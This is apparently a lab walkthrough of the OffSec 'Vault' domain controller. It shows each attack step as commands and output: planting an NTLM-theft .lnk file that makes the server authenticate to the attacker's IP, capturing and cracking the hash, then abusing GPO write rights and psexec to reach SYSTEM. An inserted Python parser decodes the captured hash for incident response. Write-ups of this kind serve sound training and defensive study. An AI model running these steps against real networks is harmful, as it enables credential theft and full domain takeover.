Machine Information
- Machine Name: Vault
- Machine Difficulty: Hard
Information Gathering
Classic nmap time
Nmap scan report for 192.168.135.172
Host is up, received user-set (0.014s latency).
Scanned at 2024-10-19 20:46:55 +08 for 191s
Not shown: 65515 filtered tcp ports (no-response)
PORT STATE SERVICE REASON VERSION
53/tcp open domain syn-ack ttl 125 Simple DNS Plus
88/tcp open kerberos-sec syn-ack ttl 125 Microsoft Windows Kerberos (server time: 2024-10-19 12:48:25Z)
135/tcp open msrpc syn-ack ttl 125 Microsoft Windows RPC
139/tcp open netbios-ssn syn-ack ttl 125 Microsoft Windows netbios-ssn
389/tcp open ldap syn-ack ttl 125 Microsoft Windows Active Directory LDAP (Domain: vault.offsec0., Site: Default-First-Site-Name)
445/tcp open microsoft-ds? syn-ack ttl 125
464/tcp open kpasswd5? syn-ack ttl 125
593/tcp open ncacn_http syn-ack ttl 125 Microsoft Windows RPC over HTTP 1.0
636/tcp open tcpwrapped syn-ack ttl 125
3268/tcp open ldap syn-ack ttl 125 Microsoft Windows Active Directory LDAP (Domain: vault.offsec0., Site: Default-First-Site-Name)
3269/tcp open tcpwrapped syn-ack ttl 125
3389/tcp open ms-wbt-server syn-ack ttl 125 Microsoft Terminal Services
| rdp-ntlm-info:
| Target_Name: VAULT
| NetBIOS_Domain_Name: VAULT
| NetBIOS_Computer_Name: DC
| DNS_Domain_Name: vault.offsec
| DNS_Computer_Name: DC.vault.offsec
| DNS_Tree_Name: vault.offsec
| Product_Version: 10.0.17763
|_ System_Time: 2024-10-19T12:49:25+00:00
|_ssl-date: 2024-10-19T12:50:05+00:00; -1s from scanner time.
| ssl-cert: Subject: commonName=DC.vault.offsec
| Issuer: commonName=DC.vault.offsec
| Public Key type: rsa
| Public Key bits: 2048
| Signature Algorithm: sha256WithRSAEncryption
| Not valid before: 2024-08-01T01:09:06
| Not valid after: 2025-01-31T01:09:06
| MD5: b115:10c2:2431:251b:edde:729e:549f:dbf6
| SHA-1: f5d0:7155:0c42:44f2:f6e3:b37d:60a7:684c:cef1:1f7c
5985/tcp open http syn-ack ttl 125 Microsoft HTTPAPI httpd 2.0 (SSDP/UPnP)
|_http-server-header: Microsoft-HTTPAPI/2.0
|_http-title: Not Found
9389/tcp open mc-nmf syn-ack ttl 125 .NET Message Framing
49666/tcp open msrpc syn-ack ttl 125 Microsoft Windows RPC
49668/tcp open msrpc syn-ack ttl 125 Microsoft Windows RPC
49673/tcp open ncacn_http syn-ack ttl 125 Microsoft Windows RPC over HTTP 1.0
49674/tcp open msrpc syn-ack ttl 125 Microsoft Windows RPC
49679/tcp open msrpc syn-ack ttl 125 Microsoft Windows RPC
49703/tcp open msrpc syn-ack ttl 125 Microsoft Windows RPC
I started out looking into the SMB port as that's the only hope I have.
Port 139/445
I tried using the default guest user and password.
smbmap -H 192.168.135.172 -u "Guest" -p ""
________ ___ ___ _______ ___ ___ __ _______
/" )|" \ /" || _ "\ |" \ /" | /""\ | __ "\
(: \___/ \ \ // |(. |_) :) \ \ // | / \ (. |__) :)
\___ \ /\ \/. ||: \/ /\ \/. | /' /\ \ |: ____/
__/ \ |: \. |(| _ \ |: \. | // __' \ (| /
/" \ :) |. \ /: ||: |_) :)|. \ /: | / / \ \ /|__/ \
(_______/ |___|\__/|___|(_______/ |___|\__/|___|(___/ \___)(_______)
-----------------------------------------------------------------------------
SMBMap - Samba Share Enumerator v1.10.4 | Shawn Evans - ShawnDEvans@gmail.com
https://github.com/ShawnDEvans/smbmap
[*] Detected 1 hosts serving SMB
[*] Established 1 SMB connections(s) and 1 authenticated session(s)
[+] IP: 192.168.135.172:445 Name: dc.vault.offsec Status: Authenticated
Disk Permissions Comment
---- ----------- -------
ADMIN$ NO ACCESS Remote Admin
C$ NO ACCESS Default share
DocumentsShare READ, WRITE
IPC$ READ ONLY Remote IPC
NETLOGON NO ACCESS Logon server share
SYSVOL NO ACCESS Logon server share
[*] Closed 1 connections
I then looked into DocumentsShare as it seems to be the only useful directory I could write to.
smbmap -H 192.168.135.172 -u "Guest" -p "" -r DocumentsShare
________ ___ ___ _______ ___ ___ __ _______
/" )|" \ /" || _ "\ |" \ /" | /""\ | __ "\
(: \___/ \ \ // |(. |_) :) \ \ // | / \ (. |__) :)
\___ \ /\ \/. ||: \/ /\ \/. | /' /\ \ |: ____/
__/ \ |: \. |(| _ \ |: \. | // __' \ (| /
/" \ :) |. \ /: ||: |_) :)|. \ /: | / / \ \ /|__/ \
(_______/ |___|\__/|___|(_______/ |___|\__/|___|(___/ \___)(_______)
-----------------------------------------------------------------------------
SMBMap - Samba Share Enumerator v1.10.4 | Shawn Evans - ShawnDEvans@gmail.com
https://github.com/ShawnDEvans/smbmap
[*] Detected 1 hosts serving SMB
[*] Established 1 SMB connections(s) and 1 authenticated session(s)
[+] IP: 192.168.135.172:445 Name: dc.vault.offsec Status: Authenticated
Disk Permissions Comment
---- ----------- -------
ADMIN$ NO ACCESS Remote Admin
C$ NO ACCESS Default share
DocumentsShare READ, WRITE
./DocumentsShare
dr--r--r-- 0 Sat Oct 19 23:01:04 2024 .
dr--r--r-- 0 Sat Oct 19 23:01:04 2024 ..
IPC$ READ ONLY Remote IPC
NETLOGON NO ACCESS Logon server share
SYSVOL NO ACCESS Logon server share
[*] Closed 1 connections
I then got stuck here and managed to get some useful information from this article and this tool. I then tried to use the tool to generate a .lnk file.
python ntlm_theft.py -g lnk -s 192.168.45.235 -f test
Created: test/test.lnk (BROWSE TO FOLDER)
Generation Complete.
After the file is created, I set up responder to capture the hash and upload the file.
smbmap -H 192.168.135.172 -u "Guest" -p "" --upload test/test.lnk DocumentsShare/test.lnk
________ ___ ___ _______ ___ ___ __ _______
/" )|" \ /" || _ "\ |" \ /" | /""\ | __ "\
(: \___/ \ \ // |(. |_) :) \ \ // | / \ (. |__) :)
\___ \ /\ \/. ||: \/ /\ \/. | /' /\ \ |: ____/
__/ \ |: \. |(| _ \ |: \. | // __' \ (| /
/" \ :) |. \ /: ||: |_) :)|. \ /: | / / \ \ /|__/ \
(_______/ |___|\__/|___|(_______/ |___|\__/|___|(___/ \___)(_______)
-----------------------------------------------------------------------------
SMBMap - Samba Share Enumerator v1.10.4 | Shawn Evans - ShawnDEvans@gmail.com
https://github.com/ShawnDEvans/smbmap
[*] Detected 1 hosts serving SMB
[*] Established 1 SMB connections(s) and 1 authenticated session(s)
[+] Starting upload: test/test.lnk (2164 bytes)
[+] Upload complete..
[*] Closed 1 connections
Once the file was uploaded, I received the hashes immediately.
responder -I tun0 -dvw
__
.----.-----.-----.-----.-----.-----.--| |.-----.----.
| _| -__|__ --| _ | _ | | _ || -__| _|
|__| |_____|_____| __|_____|__|__|_____||_____|__|
|__|
NBT-NS, LLMNR & MDNS Responder 3.1.5.0
[+] Listening for events...
[SMB] NTLMv2-SSP Client : 192.168.135.172
[SMB] NTLMv2-SSP Username : VAULT\anirudh
[SMB] NTLMv2-SSP Hash : anirudh::VAULT:dffac804bc142d1a:9B831C630A0CE9CD8A6ED5DF2D33FCDC:010100000000000000089D717B22DB015BBB1241E5B9989B0000000002000800350056003600410001001E00570049004E002D003300450031003300550049005200520034003000042000400340057004900E002D00330045003100330055004900520052003400300042002E0035005600360041002E004C004F00430041004C000300140035005600360041002E004C004F00430041004C000500140035005600360041002E004C004F00430041004C000700080000089D717B22DB01060004000200000008003000300000000000000001000000002000001830F0C706803F0173332094F5B2BB5FB0C4DAD79922348512363CC7DC51C8100A001000000000000000000000000000000000000900260063006900660073002F003100390032002E003100360038002E00340035002E00320033003500000000000000000
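Responder's hash line is more than a crackable credential: the client copies the AV pairs from the server's CHALLENGE into its NTLMv2 response, so the blob records the fake server names Responder advertised and the SPN cifs/192.168.45.235 that the DC was coerced into authenticating to, which is exactly what an incident responder wants out of a captured or logged NetNTLMv2 exchange. The parser below is an added example, not code from the writeup or from Responder; it assumes nothing beyond the captured line above.

```python
import struct
from datetime import datetime, timedelta, timezone

# The NetNTLMv2 line Responder printed above (john/hashcat format), joined back
# into one string; the hex is only re-wrapped here for readability.
CAPTURED = (
    "anirudh::VAULT:dffac804bc142d1a:9B831C630A0CE9CD8A6ED5DF2D33FCDC:"
    "010100000000000000089D717B22DB015BBB1241E5B9989B00000000020008003500560036004100"
    "01001E00570049004E002D0033004500310033005500490052005200340030004200"
    "04003400570049004E002D00330045003100330055004900520052003400300042002E0035005600360041002E004C004F00430041004C00"
    "0300140035005600360041002E004C004F00430041004C000500140035005600360041002E004C004F00430041004C00"
    "0700080000089D717B22DB010600040002000000"
    "08003000300000000000000001000000002000001830F0C706803F0173332094F5B2BB5FB0C4DAD79922348512363CC7DC51C810"
    "0A001000000000000000000000000000000000000900260063006900660073002F00310039003200"
    "2E003100360038002E00340035002E0032003300350000000000000000"
)
AV_NAMES = {1: "NbComputerName", 2: "NbDomainName", 3: "DnsComputerName", 4: "DnsDomainName",
            5: "DnsTreeName", 6: "Flags", 7: "Timestamp", 8: "SingleHost", 9: "TargetName",
            10: "ChannelBindings"}

def filetime(raw):
    """Windows FILETIME (100 ns ticks since 1601-01-01 UTC) -> ISO 8601 string."""
    ticks = struct.unpack("<Q", raw)[0]
    t = datetime(1601, 1, 1, tzinfo=timezone.utc) + timedelta(microseconds=ticks // 10)
    return t.strftime("%Y-%m-%dT%H:%M:%SZ")

DECODE = {6: lambda v: struct.unpack("<I", v)[0], 7: filetime}  # MsvAvFlags, MsvAvTimestamp

def parse_netntlmv2(line):
    """Split a NetNTLMv2 line and decode the AV_PAIR list copied from the server CHALLENGE (MS-NLMP 2.2.2.1)."""
    user, _, rest = line.partition("::")
    domain, server_challenge, nt_proof, blob_hex = rest.split(":")
    blob = bytes.fromhex(blob_hex)
    # NTLMv2_CLIENT_CHALLENGE header: RespType, HiRespType, Reserved1, Reserved2,
    # TimeStamp(8), ChallengeFromClient(8), Reserved3 -> 28 bytes before the AV pairs
    _, _, _, _, ts, client_challenge, _ = struct.unpack_from("<BBHIQ8sI", blob, 0)
    av, off = {}, 28
    while True:
        av_id, av_len = struct.unpack_from("<HH", blob, off)
        value, off = blob[off + 4:off + 4 + av_len], off + 4 + av_len
        if av_id == 0:  # MsvAvEOL terminates the list
            break
        name = AV_NAMES.get(av_id, f"AvId{av_id}")
        if av_id in (1, 2, 3, 4, 5, 9):  # NetBIOS/DNS names and the target SPN are UTF-16LE
            av[name] = value.decode("utf-16-le")
        else:  # SingleHost and ChannelBindings are kept as hex
            av[name] = DECODE.get(av_id, bytes.hex)(value)
    return {"user": user, "domain": domain, "server_challenge": server_challenge, "nt_proof": nt_proof,
            "timestamp": filetime(struct.pack("<Q", ts)), "client_challenge": client_challenge.hex(),
            "av_pairs": av}
```

Flags == 2 is the MsvAvFlags "MIC provided" bit, and TargetName is the SPN the client built for the host it actually reached, so an IP-based cifs/ SPN pointing outside the domain in a logged or captured response is a strong coercion indicator.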
Now that I have the hash, time to crack it.
john -w=/usr/share/wordlists/rockyou.txt hash
Using default input encoding: UTF-8
Loaded 1 password hash (netntlmv2, NTLMv2 C/R [MD4 HMAC-MD5 32/64])
Will run 2 OpenMP threads
Press 'q' or Ctrl-C to abort, almost any other key for status
SecureHM (anirudh)
1g 0:00:00:08 DONE (2024-10-19 23:08) 0.1236g/s 1311Kp/s 1311Kc/s 1311KC/s Seifer@14..Sda10184
Use the "--show --format=netntlmv2" options to display all of the cracked passwords reliably
Session completed.
Now that I have a password, I tried to look into the services that I have access to using netexec.
netexec winrm 192.168.135.172 -u "anirudh" -p "SecureHM"
WINRM 192.168.135.172 5985 DC [*] Windows 10 / Server 2019 Build 17763 (name:DC) (domain:vault.offsec)
WINRM 192.168.135.172 5985 DC [+] vault.offsec\anirudh:SecureHM (Pwn3d!)
With the Pwn3d! message, I could gain access to the shell.
Port 5985
evil-winrm -i 192.168.135.172 -u anirudh -p SecureHM
Evil-WinRM shell v3.5
Warning: Remote path completions is disabled due to ruby limitation: quoting_detection_proc() function is unimplemented on this machine
Data: For more information, check Evil-WinRM GitHub: https://github.com/Hackplayers/evil-winrm#Remote-path-completion
Info: Establishing connection to remote endpoint
*Evil-WinRM* PS C:\Users\anirudh\Documents> whoami
vault\anirudh
Now that I have a shell but not an administrator account, time for privilege escalation.
Privilege Escalation
As usual, just run winpeas and bloodhound-python if this is AD. After reading the information, here's something interesting provided by bloodhound: the current user has WriteDacl, WriteOwner and GenericWrite on the DEFAULT DOMAIN POLICY GPO. After understanding it, it seems like I could use pyGPOAbuse.py to get an administrator shell. The GPO id could be found in bloodhound when clicking on the DEFAULT DOMAIN POLICY.
python pygpoabuse.py vault.offsec/anirudh:SecureHM -gpo-id 31B2F340-016D-11D2-945F-00C04FB984F9
SUCCESS:root:ScheduledTask TASK_71a4800b created!
[+] ScheduledTask TASK_71a4800b created!
It seems like it has successfully created a task. According to this article, the task will add the user john into the local administrators group. I then checked whether the user was added to the group.
netexec smb 192.168.135.172 -u "john" -p "H4x00r123.."
SMB 192.168.135.172 445 DC [*] Windows 10 / Server 2019 Build 17763 x64 (name:DC) (domain:vault.offsec) (signing:True) (SMBv1:False)
SMB 192.168.135.172 445 DC [+] vault.offsec\john:H4x00r123.. (Pwn3d!)
Yeap, the user john was added to the machine. Since it is Pwn3d! on the SMB port, I could just get an administrator shell.
impacket-psexec vault.offsec/john:'H4x00r123..'@192.168.135.172
Impacket v0.12.0.dev1 - Copyright 2023 Fortra
[*] Requesting shares on 192.168.135.172.....
[*] Found writable share ADMIN$
[*] Uploading file XGHpeSsX.exe
[*] Opening SVCManager on 192.168.135.172.....
[*] Creating service RPDo on 192.168.135.172.....
[*] Starting service RPDo.....
[!] Press help for extra shell commands
Microsoft Windows [Version 10.0.17763.2300]
(c) 2018 Microsoft Corporation. All rights reserved.
C:\Windows\system32> whoami
nt authority\system
Things I learned from this machine
- another new method of stealing NTLMv2 hashes
- bloodhound saved the day
- using this pyGPOabuse.py without the need for a shell is amazing